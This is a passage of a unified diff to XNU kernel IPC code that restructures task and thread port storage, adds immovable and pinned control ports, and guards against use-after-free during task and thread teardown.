        if (kport != IP_NULL) {
                ipc_kobject_set(kport, (ipc_kobject_t) task, IKOT_TASK_CONTROL);
        }
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        if (nport != IP_NULL) {
                ipc_kobject_set(nport, (ipc_kobject_t) task, IKOT_TASK_NAME);
        }
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
        if (iport != IP_NULL) {
                ipc_kobject_set(iport, (ipc_kobject_t) task, IKOT_TASK_INSPECT);
        }
-       rdport = task->itk_self[TASK_FLAVOR_READ];
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
        if (rdport != IP_NULL) {
                ipc_kobject_set(rdport, (ipc_kobject_t) task, IKOT_TASK_READ);
        }
+       pport = task->itk_self;
+       if (immovable_control_port_enabled && pport != IP_NULL) {
+               ipc_kobject_set(pport, (ipc_kobject_t) task, IKOT_TASK_CONTROL);
+       }
 
        itk_unlock(task);
 }
@@ -319,24 +343,45 @@ ipc_task_disable(
        ipc_port_t iport;
        ipc_port_t rdport;
        ipc_port_t rport;
+       ipc_port_t pport;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       /*
+        * This innocuous looking line is load bearing.
+        *
+        * It is used to disable the creation of lazy made ports.
+        * We must do so before we drop the last reference on the task,
+        * as task ports do not own a reference on the task, and
+        * convert_port_to_task* will crash trying to resurect a task.
+        */
+       task->ipc_active = false;
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
        if (kport != IP_NULL) {
-               ipc_kobject_set(kport, IKO_NULL, IKOT_NONE);
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
        }
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        if (nport != IP_NULL) {
                ipc_kobject_set(nport, IKO_NULL, IKOT_NONE);
        }
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
        if (iport != IP_NULL) {
                ipc_kobject_set(iport, IKO_NULL, IKOT_NONE);
        }
-       rdport = task->itk_self[TASK_FLAVOR_READ];
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
        if (rdport != IP_NULL) {
                ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE);
        }
+       pport = task->itk_self;
+       if (pport != kport && pport != IP_NULL) {
+               assert(immovable_control_port_enabled);
+               assert(pport->ip_immovable_send);
+               ipc_kobject_set(pport, IKO_NULL, IKOT_NONE);
+       }
 
        rport = task->itk_resume;
        if (rport != IP_NULL) {
@@ -375,27 +420,51 @@ ipc_task_terminate(
        ipc_port_t iport;
        ipc_port_t rdport;
        ipc_port_t rport;
-       int i;
+       ipc_port_t pport;
+       ipc_port_t sself;
+       ipc_port_t *notifiers_ptr = NULL;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       /*
+        * If we ever failed to clear ipc_active before the last reference
+        * was dropped, lazy ports might be made and used after the last
+        * reference is dropped and cause use after free (see comment in
+        * ipc_task_disable()).
+        */
+       assert(!task->ipc_active);
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
+       sself = task->itk_settable_self;
 
        if (kport == IP_NULL) {
                /* the task is already terminated (can this happen?) */
                itk_unlock(task);
                return;
        }
-       task->itk_self[TASK_FLAVOR_CONTROL] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = IP_NULL;
 
-       rdport = task->itk_self[TASK_FLAVOR_READ];
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
 
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
 
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        assert(nport != IP_NULL);
-       task->itk_self[TASK_FLAVOR_NAME] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_NAME] = IP_NULL;
+
+       if (task->itk_dyld_notify) {
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+       }
+
+       if (immovable_control_port_enabled) {
+               pport = task->itk_self;
+               assert(pport != IP_NULL);
+       }
+
+       task->itk_self = IP_NULL;
 
        rport = task->itk_resume;
        task->itk_resume = IP_NULL;
@@ -403,12 +472,20 @@ ipc_task_terminate(
        itk_unlock(task);
 
        /* release the naked send rights */
+       if (IP_VALID(sself)) {
+               ipc_port_release_send(sself);
+       }
 
-       if (IP_VALID(task->itk_settable_self)) {
-               ipc_port_release_send(task->itk_settable_self);
+       if (notifiers_ptr) {
+               for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) {
+                       if (IP_VALID(notifiers_ptr[i])) {
+                               ipc_port_release_send(notifiers_ptr[i]);
+                       }
+               }
+               kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t));
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                if (IP_VALID(task->exc_actions[i].port)) {
                        ipc_port_release_send(task->exc_actions[i].port);
                }
@@ -441,13 +518,22 @@ ipc_task_terminate(
                ipc_port_release_send(task->itk_debug_control);
        }
 
-       for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
+       for (int i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
                if (IP_VALID(task->itk_registered[i])) {
                        ipc_port_release_send(task->itk_registered[i]);
                }
        }
 
        /* destroy the kernel ports */
+       if (immovable_control_port_enabled) {
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
+
+               /* pport == kport if immovability is off */
+               ipc_port_dealloc_kernel(pport);
+       }
        ipc_port_dealloc_kernel(kport);
        ipc_port_dealloc_kernel(nport);
        if (iport != IP_NULL) {
@@ -479,32 +565,53 @@ void
 ipc_task_reset(
        task_t          task)
 {
-       ipc_port_t old_kport, new_kport;
+       ipc_port_t old_kport, old_pport, new_kport, new_pport;
        ipc_port_t old_sself;
        ipc_port_t old_rdport;
        ipc_port_t old_iport;
        ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
-       int i;
+       ipc_port_t *notifiers_ptr = NULL;
 
 #if CONFIG_MACF
        /* Fresh label to unset credentials in existing labels. */
        struct label *unset_label = mac_exc_create_label();
 #endif
 
-       new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, IKOT_TASK_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       if (immovable_control_port_enabled) {
+               ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               if (pinned_control_port_enabled) {
+                       options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+
+               new_pport = ipc_kobject_alloc_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, options);
+
+               new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, IPC_LABEL_SUBST_TASK,
+                   IPC_KOBJECT_ALLOC_NONE);
+               new_kport->ip_alt_port = new_pport;
+       } else {
+               new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task,
+                   IKOT_TASK_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               new_pport = new_kport;
+       }
 
        itk_lock(task);
 
-       old_kport = task->itk_self[TASK_FLAVOR_CONTROL];
-       old_rdport = task->itk_self[TASK_FLAVOR_READ];
-       old_iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       old_kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
+       old_rdport = task->itk_task_ports[TASK_FLAVOR_READ];
+       old_iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
 
-       if (old_kport == IP_NULL) {
+       old_pport = task->itk_self;
+
+       if (old_pport == IP_NULL) {
                /* the task is already terminated (can this happen?) */
                itk_unlock(task);
-               ipc_port_release_send(new_kport);
                ipc_port_dealloc_kernel(new_kport);
+               if (immovable_control_port_enabled) {
+                       ipc_port_dealloc_kernel(new_pport);
+               }
 #if CONFIG_MACF
                mac_exc_free_label(unset_label);
 #endif
@@ -512,19 +619,30 @@ ipc_task_reset(
        }
 
        old_sself = task->itk_settable_self;
-       task->itk_settable_self = task->itk_self[TASK_FLAVOR_CONTROL] = new_kport;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = new_kport;
+       task->itk_self = new_pport;
+
+       task->itk_settable_self = ipc_port_make_send(new_kport);
 
        /* Set the old kport to IKOT_NONE and update the exec token while under the port lock */
        ip_lock(old_kport);
+       old_kport->ip_alt_port = IP_NULL;
        ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE);
        task->exec_token += 1;
        ip_unlock(old_kport);
 
        /* Reset the read and inspect flavors of task port */
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       if (immovable_control_port_enabled) {
+               ip_lock(old_pport);
+               ipc_kobject_set_atomically(old_pport, IKO_NULL, IKOT_NONE);
+               task->exec_token += 1;
+               ip_unlock(old_pport);
+       }
+
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                old_exc_actions[i] = IP_NULL;
 
                if (i == EXC_CORPSE_NOTIFY && task_corpse_pending_report(task)) {
@@ -545,6 +663,11 @@ ipc_task_reset(
        }
        task->itk_debug_control = IP_NULL;
 
+       if (task->itk_dyld_notify) {
+               notifiers_ptr = task->itk_dyld_notify;
+               task->itk_dyld_notify = NULL;
+       }
+
        itk_unlock(task);
 
 #if CONFIG_MACF
@@ -557,7 +680,16 @@ ipc_task_reset(
                ipc_port_release_send(old_sself);
        }
 
-       for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
+       if (notifiers_ptr) {
+               for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) {
+                       if (IP_VALID(notifiers_ptr[i])) {
+                               ipc_port_release_send(notifiers_ptr[i]);
+                       }
+               }
+               kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t));
+       }
+
+       for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
                if (IP_VALID(old_exc_actions[i])) {
                        ipc_port_release_send(old_exc_actions[i]);
                }
@@ -565,6 +697,9 @@ ipc_task_reset(
 
        /* destroy all task port flavors */
        ipc_port_dealloc_kernel(old_kport);
+       if (immovable_control_port_enabled) {
+               ipc_port_dealloc_kernel(old_pport);
+       }
        if (old_rdport != IP_NULL) {
                ipc_port_dealloc_kernel(old_rdport);
        }
@@ -583,16 +718,46 @@ ipc_task_reset(
 
 void
 ipc_thread_init(
-       thread_t        thread)
+       thread_t        thread,
+       ipc_thread_init_options_t options)
 {
        ipc_port_t      kport;
+       ipc_port_t      pport;
+       ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE;
+
+       /*
+        * Having immovable_control_port_enabled boot-arg set does not guarantee
+        * thread control port should be made immovable/pinned, also check options.
+        *
+        * raw mach threads created via thread_create() have neither of INIT_PINNED
+        * or INIT_IMMOVABLE set.
+        */
+       if (immovable_control_port_enabled && (options & IPC_THREAD_INIT_IMMOVABLE)) {
+               alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+
+               if (pinned_control_port_enabled && (options & IPC_THREAD_INIT_PINNED)) {
+                       alloc_options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+
+               pport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, alloc_options);
+
+               kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, IPC_KOBJECT_ALLOC_NONE);
+               kport->ip_alt_port = pport;
+       } else {
+               kport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               pport = kport;
+       }
+
+       thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = kport;
+
+       thread->ith_settable_self = ipc_port_make_send(kport);
 
-       kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       thread->ith_self = pport;
 
-       thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = kport;
-       thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
-       thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
        thread->ith_special_reply_port = NULL;
        thread->exc_actions = NULL;
 
@@ -600,6 +765,7 @@ ipc_thread_init(
        thread->ith_assertions = 0;
 #endif
 
+       thread->ipc_active = true;
        ipc_kmsg_queue_init(&thread->ith_messages);
 
        thread->ith_rpc_reply = IP_NULL;
@@ -649,12 +815,26 @@ void
 ipc_thread_disable(
        thread_t        thread)
 {
-       ipc_port_t      kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       ipc_port_t      iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
-       ipc_port_t      rdport = thread->ith_self[THREAD_FLAVOR_READ];
+       ipc_port_t      kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       ipc_port_t      iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+       ipc_port_t      rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       ipc_port_t      pport = thread->ith_self;
+
+       /*
+        * This innocuous looking line is load bearing.
+        *
+        * It is used to disable the creation of lazy made ports.
+        * We must do so before we drop the last reference on the thread,
+        * as thread ports do not own a reference on the thread, and
+        * convert_port_to_thread* will crash trying to resurect a thread.
+        */
+       thread->ipc_active = false;
 
        if (kport != IP_NULL) {
-               ipc_kobject_set(kport, IKO_NULL, IKOT_NONE);
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
        }
 
        if (iport != IP_NULL) {
@@ -665,6 +845,12 @@ ipc_thread_disable(
                ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE);
        }
 
+       if (pport != kport && pport != IP_NULL) {
+               assert(immovable_control_port_enabled);
+               assert(pport->ip_immovable_send);
+               ipc_kobject_set(pport, IKO_NULL, IKOT_NONE);
+       }
+
        /* unbind the thread special reply port */
        if (IP_VALID(thread->ith_special_reply_port)) {
                ipc_port_unbind_special_reply_port(thread, TRUE);
@@ -687,21 +873,33 @@ ipc_thread_terminate(
        ipc_port_t iport = IP_NULL;
        ipc_port_t rdport = IP_NULL;
        ipc_port_t ith_rpc_reply = IP_NULL;
+       ipc_port_t pport = IP_NULL;
 
        thread_mtx_lock(thread);
 
-       kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
-       rdport = thread->ith_self[THREAD_FLAVOR_READ];
+       /*
+        * If we ever failed to clear ipc_active before the last reference
+        * was dropped, lazy ports might be made and used after the last
+        * reference is dropped and cause use after free (see comment in
+        * ipc_thread_disable()).
+        */
+       assert(!thread->ipc_active);
+
+       kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+       rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       pport = thread->ith_self;
 
        if (kport != IP_NULL) {
                if (IP_VALID(thread->ith_settable_self)) {
                        ipc_port_release_send(thread->ith_settable_self);
                }
 
-               thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = IP_NULL;
-               thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
-               thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL;
+               thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL;
+               thread->ith_settable_self = IP_NULL;
+               thread->ith_self = IP_NULL;
 
                if (thread->exc_actions != NULL) {
                        for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) {
@@ -723,6 +921,14 @@ ipc_thread_terminate(
 
        thread_mtx_unlock(thread);
 
+       if (pport != kport && pport != IP_NULL) {
+               /* this thread has immovable contorl port */
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
+               ipc_port_dealloc_kernel(pport);
+       }
        if (kport != IP_NULL) {
                ipc_port_dealloc_kernel(kport);
        }
@@ -754,45 +960,80 @@ void
 ipc_thread_reset(
        thread_t        thread)
 {
-       ipc_port_t old_kport, new_kport;
+       ipc_port_t old_kport, new_kport, old_pport, new_pport;
        ipc_port_t old_sself;
        ipc_port_t old_rdport;
        ipc_port_t old_iport;
        ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
        boolean_t  has_old_exc_actions = FALSE;
+       boolean_t thread_is_immovable, thread_is_pinned;
        int i;
 
 #if CONFIG_MACF
        struct label *new_label = mac_exc_create_label();
 #endif
 
-       new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL,
-           IPC_KOBJECT_ALLOC_MAKE_SEND);
+       thread_is_immovable = thread->ith_self->ip_immovable_send;
+       thread_is_pinned = thread->ith_self->ip_pinned;
+
+       if (thread_is_immovable) {
+               ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE;
+
+               if (thread_is_pinned) {
+                       assert(pinned_control_port_enabled);
+                       alloc_options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+               if (thread_is_immovable) {
+                       alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               }
+               new_pport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, alloc_options);
+
+               new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD,
+                   IPC_KOBJECT_ALLOC_NONE);
+               new_kport->ip_alt_port = new_pport;
+       } else {
+               new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread,
+                   IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE);
+
+               new_pport = new_kport;
+       }
 
        thread_mtx_lock(thread);
 
-       old_kport = thread->ith_self[THREAD_FLAVOR_CONTROL];
-       old_rdport = thread->ith_self[THREAD_FLAVOR_READ];
-       old_iport = thread->ith_self[THREAD_FLAVOR_INSPECT];
+       old_kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL];
+       old_rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ];
+       old_iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT];
+
        old_sself = thread->ith_settable_self;
+       old_pport = thread->ith_self;
 
        if (old_kport == IP_NULL && thread->inspection == FALSE) {
-               /* th is already terminated (can this happen?) */
+               /* thread is already terminated (can this happen?) */
                thread_mtx_unlock(thread);
-               ipc_port_release_send(new_kport);
                ipc_port_dealloc_kernel(new_kport);
+               if (thread_is_immovable) {
+                       ipc_port_dealloc_kernel(new_pport);
+               }
 #if CONFIG_MACF
                mac_exc_free_label(new_label);
 #endif
                return;
        }
 
-       thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = new_kport;
-       thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL;
-       thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL;
+       thread->ipc_active = true;
+       thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = new_kport;
+       thread->ith_self = new_pport;
+       thread->ith_settable_self = ipc_port_make_send(new_kport);
+       thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL;
+       thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL;
 
        if (old_kport != IP_NULL) {
-               ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE);
+               ip_lock(old_kport);
+               old_kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(old_kport);
        }
        if (old_rdport != IP_NULL) {
                ipc_kobject_set(old_rdport, IKO_NULL, IKOT_NONE);
@@ -800,6 +1041,9 @@ ipc_thread_reset(
        if (old_iport != IP_NULL) {
                ipc_kobject_set(old_iport, IKO_NULL, IKOT_NONE);
        }
+       if (thread_is_immovable && old_pport != IP_NULL) {
+               ipc_kobject_set(old_pport, IKO_NULL, IKOT_NONE);
+       }
 
        /*
         * Only ports that were set by root-owned processes
@@ -849,6 +1093,10 @@ ipc_thread_reset(
                ipc_port_dealloc_kernel(old_iport);
        }
 
+       if (thread_is_immovable && old_pport != IP_NULL) {
+               ipc_port_dealloc_kernel(old_pport);
+       }
+
        /* unbind the thread special reply port */
        if (IP_VALID(thread->ith_special_reply_port)) {
                ipc_port_unbind_special_reply_port(thread, TRUE);
@@ -871,26 +1119,51 @@ ipc_port_t
 retrieve_task_self_fast(
        task_t          task)
 {
-       __assert_only ipc_port_t sright;
-       ipc_port_t port;
+       ipc_port_t port = IP_NULL;
 
        assert(task == current_task());
 
        itk_lock(task);
-       assert(task->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL);
-
-       if ((port = task->itk_settable_self) == task->itk_self[TASK_FLAVOR_CONTROL]) {
-               /* no interposing */
-               sright = ipc_port_copy_send(port);
-               assert(sright == port);
+       assert(task->itk_self != IP_NULL);
+
+       if (task->itk_settable_self == task->itk_task_ports[TASK_FLAVOR_CONTROL]) {
+               /* no interposing, return the IMMOVABLE port */
+               port = ipc_port_make_send(task->itk_self);
+               if (immovable_control_port_enabled) {
+                       assert(port->ip_immovable_send == 1);
+                       if (pinned_control_port_enabled) {
+                               /* pinned port is also immovable */
+                               assert(port->ip_pinned == 1);
+                       }
+               }
        } else {
-               port = ipc_port_copy_send(port);
+               port = ipc_port_copy_send(task->itk_settable_self);
        }
        itk_unlock(task);
 
        return port;
 }
 
+/*
+ *     Routine:        mach_task_is_self
+ *     Purpose:
+ *      [MIG call] Checks if the task (control/read/inspect/name/movable)
+ *      port is pointing to current_task.
+ */
+kern_return_t
+mach_task_is_self(
+       task_t         task,
+       boolean_t     *is_self)
+{
+       if (task == TASK_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       *is_self = (task == current_task());
+
+       return KERN_SUCCESS;
+}
+
 /*
  *     Routine:        retrieve_thread_self_fast
  *     Purpose:
@@ -907,21 +1180,19 @@ ipc_port_t
 retrieve_thread_self_fast(
        thread_t                thread)
 {
-       __assert_only ipc_port_t sright;
-       ipc_port_t port;
+       ipc_port_t port = IP_NULL;
 
        assert(thread == current_thread());
 
        thread_mtx_lock(thread);
 
-       assert(thread->ith_self[THREAD_FLAVOR_CONTROL] != IP_NULL);
+       assert(thread->ith_self != IP_NULL);
 
-       if ((port = thread->ith_settable_self) == thread->ith_self[THREAD_FLAVOR_CONTROL]) {
-               /* no interposing */
-               sright = ipc_port_copy_send(port);
-               assert(sright == port);
+       if (thread->ith_settable_self == thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]) {
+               /* no interposing, return IMMOVABLE_PORT */
+               port = ipc_port_make_send(thread->ith_self);
        } else {
-               port = ipc_port_copy_send(port);
+               port = ipc_port_copy_send(thread->ith_settable_self);
        }
 
        thread_mtx_unlock(thread);
@@ -1129,8 +1400,7 @@ thread_get_special_port(
        int                      which,
        ipc_port_t              *portp);
 
-kern_return_t
-static
+static kern_return_t
 thread_get_special_port_internal(
        thread_inspect_t         thread,
        int                      which,
@@ -1176,7 +1446,6 @@ thread_get_special_port_internal(
        }
 
        *portp = port;
-
        return KERN_SUCCESS;
 }
 
@@ -1189,6 +1458,26 @@ thread_get_special_port(
        return thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL);
 }
 
+static ipc_port_t
+thread_get_non_substituted_self(thread_t thread)
+{
+       ipc_port_t port = IP_NULL;
+
+       thread_mtx_lock(thread);
+       port = thread->ith_settable_self;
+       if (IP_VALID(port)) {
+               ip_reference(port);
+       }
+       thread_mtx_unlock(thread);
+
+       if (IP_VALID(port)) {
+               /* consumes the port reference */
+               return ipc_kobject_alloc_subst_once(port);
+       }
+
+       return port;
+}
+
 kern_return_t
 thread_get_special_port_from_user(
        mach_port_t     port,
@@ -1196,29 +1485,49 @@ thread_get_special_port_from_user(
        ipc_port_t      *portp)
 {
        ipc_kobject_type_t kotype;
-       kern_return_t kr;
+       mach_thread_flavor_t flavor;
+       kern_return_t kr = KERN_SUCCESS;
 
-       thread_t thread = convert_port_to_thread_check_type(port, &kotype, THREAD_FLAVOR_INSPECT, FALSE);
+       thread_t thread = convert_port_to_thread_check_type(port, &kotype,
+           THREAD_FLAVOR_INSPECT, FALSE);
 
        if (thread == THREAD_NULL) {
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (which == THREAD_KERNEL_PORT && thread->task == current_task()) {
+#if CONFIG_MACF
+               /*
+                * only check for threads belong to current_task,
+                * because foreign thread ports are always movable
+                */
+               if (mac_task_check_get_movable_control_port()) {
+                       kr = KERN_DENIED;
+                       goto out;
+               }
+#endif
+               if (kotype == IKOT_THREAD_CONTROL) {
+                       *portp = thread_get_non_substituted_self(thread);
+                       goto out;
+               }
+       }
+
        switch (kotype) {
        case IKOT_THREAD_CONTROL:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_CONTROL);
+               flavor = THREAD_FLAVOR_CONTROL;
                break;
        case IKOT_THREAD_READ:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_READ);
+               flavor = THREAD_FLAVOR_READ;
                break;
        case IKOT_THREAD_INSPECT:
-               kr = thread_get_special_port_internal(thread, which, portp, THREAD_FLAVOR_INSPECT);
+               flavor = THREAD_FLAVOR_INSPECT;
                break;
        default:
                panic("strange kobject type");
-               break;
        }
 
+       kr = thread_get_special_port_internal(thread, which, portp, flavor);
+out:
        thread_deallocate(thread);
        return kr;
 }
@@ -1267,6 +1576,7 @@ port_allowed_with_thread_flavor(
  *     Returns:
  *             KERN_SUCCESS            Changed the special port.
  *             KERN_INVALID_ARGUMENT   The thread is null.
+ *      KERN_INVALID_RIGHT      Port is marked as immovable.
  *             KERN_FAILURE            The thread is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
  *             KERN_NO_ACCESS          Restricted access to set port.
@@ -1276,7 +1586,7 @@ kern_return_t
 thread_set_special_port(
        thread_t                thread,
        int                     which,
-       ipc_port_t      port)
+       ipc_port_t              port)
 {
        kern_return_t   result = KERN_SUCCESS;
        ipc_port_t              *whichp, old = IP_NULL;
@@ -1285,6 +1595,10 @@ thread_set_special_port(
                return KERN_INVALID_ARGUMENT;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        switch (which) {
        case THREAD_KERNEL_PORT:
 #if CONFIG_CSR
@@ -1330,9 +1644,9 @@ thread_set_special_port(
  *     Conditions:
  *             Nothing locked.
  *     Returns:
- *             KERN_SUCCESS            Extracted a send right.
+ *             KERN_SUCCESS                Extracted a send right.
  *             KERN_INVALID_ARGUMENT   The task is null.
- *             KERN_FAILURE            The task/space is dead.
+ *             KERN_FAILURE                The task/space is dead.
  *             KERN_INVALID_ARGUMENT   Invalid special port.
  */
 
@@ -1361,7 +1675,7 @@ task_get_special_port_internal(
        }
 
        itk_lock(task);
-       if (task->itk_self[TASK_FLAVOR_CONTROL] == IP_NULL) {
+       if (!task->ipc_active) {
                itk_unlock(task);
                return KERN_FAILURE;
        }
@@ -1369,6 +1683,7 @@ task_get_special_port_internal(
        switch (which) {
        case TASK_KERNEL_PORT:
                port = ipc_port_copy_send(task->itk_settable_self);
+               itk_unlock(task);
                break;
 
        case TASK_READ_PORT:
@@ -1379,30 +1694,36 @@ task_get_special_port_internal(
                /* convert_task_to_port_with_flavor consumes a task reference */
                task_reference(task);
                port = convert_task_to_port_with_flavor(task, current_flavor);
-               goto copyout;
+               break;
 
        case TASK_NAME_PORT:
-               port = ipc_port_make_send(task->itk_self[TASK_FLAVOR_NAME]);
+               port = ipc_port_make_send(task->itk_task_ports[TASK_FLAVOR_NAME]);
+               itk_unlock(task);
                break;
 
        case TASK_HOST_PORT:
                port = ipc_port_copy_send(task->itk_host);
+               itk_unlock(task);
                break;
 
        case TASK_BOOTSTRAP_PORT:
                port = ipc_port_copy_send(task->itk_bootstrap);
+               itk_unlock(task);
                break;
 
        case TASK_SEATBELT_PORT:
                port = ipc_port_copy_send(task->itk_seatbelt);
+               itk_unlock(task);
                break;
 
